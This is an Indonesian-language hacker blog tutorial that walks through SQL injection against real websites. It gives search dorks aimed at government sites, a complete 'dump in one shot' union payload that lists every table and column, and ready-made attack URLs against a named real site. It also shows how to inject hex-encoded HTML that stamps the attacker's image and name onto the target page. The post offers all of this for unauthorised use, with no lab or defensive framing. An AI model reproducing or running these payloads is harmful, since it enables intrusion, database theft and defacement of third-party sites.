Cara belajar SQL Chall
Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat oke kali ini kita akan kasih tutorial Cara sql chall
Ok kita langsung saja cikidot
Dork:-index.php?Id= site:go.id
-news.php?id=
Dios:
concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
<center><img src="https://d.top4top.io/p_16098ygtz0.png" height="400px" width="400px"><br>terinjeck nama kalian <br>
Oke langsung saja tutorialnya
Pertama kalian dork dulu dan cari targetnya.
Disini saya sudah punya target nya contoh: http://kansascitynova.org/news.php?id=42
Jika kalian sudah punya target kalian bisa tambahin (') di belakang angka PHP?id=42 jika ada tulisan Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''42''' at line 1
Nah jika ada tulisan begitu kalia tinggal tambahin order by di belakang '
Contoh :
http://kansascitynova.org/news.php?id=42'+order+by+1--+- gak eror
http://kansascitynova.org/news.php?id=42'+order+by+2--+- gak eror
http://kansascitynova.org/news.php?id=42'+order+by+3--+- gak eror
Dan seterusnya, sampai eror
http://kansascitynova.org/news.php?id=42'+order+by+8--+- eror
Nanti ada tulisan Error: Unknown column '8' in 'order clause'
Kayk gitu dan selanjutnya kalian hapus order bynya ganti dengan +union+select+ Jan lupa kasih tanda - di depan angka php?id=-42 dan masukan angka eror kalian jika angka eror kalian 12 maka kalian ketik 1-12
Contoh:
http://kansascitynova.org/news.php?id=42'+union select+1,2,3,4,5,6,7--+-
Jika muncul angka togel kalian dan masukan Dios nya
Contoh angka togel kalian di 5 kalian masukkan Dios kalian
http://kansascitynova.org/news.php?id=42'+union select+1,2,3,4,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6,7--+-
Nah kayak gitu,jika kalian ingin tambahkan foto kalin dengan nama kalian bisa https://www.convertstring.com/id/EncodeDecode/HexEncode jika sudah
Nanti ada angka dan lupa tambahin 0x di depan contoh:
0x3C63656E7465723E3C696D67207372633D2268747470733A2F2F642E746F7034746F702E696F2F705F31363039387967747A302E706E6722206865696768743D223430307078222077696474683D223430307078223E3C62723E746572696E6A65636B204259204D72426C61636B686174203C62723E
Kalian tinggal salin dan masukan di angka togel kalian mumpung angka togel saya ada dua
Contoh: http://kansascitynova.org/news.php?id=-42%27+union+select+1,0x3C63656E7465723E3C696D67207372633D2268747470733A2F2F642E746F7034746F702E696F2F705F31363039387967747A302E706E6722206865696768743D223430307078222077696474683D223430307078223E3C62723E746572696E6A65636B204259204D72426C61636B686174203C62723E,3,4,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6,7--+-
Dan hasilnya
Boom sekian dari saya tutorialnya mohon maaf jika ada salah dalam perkataan karna kita juga manusia wassalamualaikum wr wb
Jika masih belum paham bisa lihat video di bawah ini:
Komentar
Posting Komentar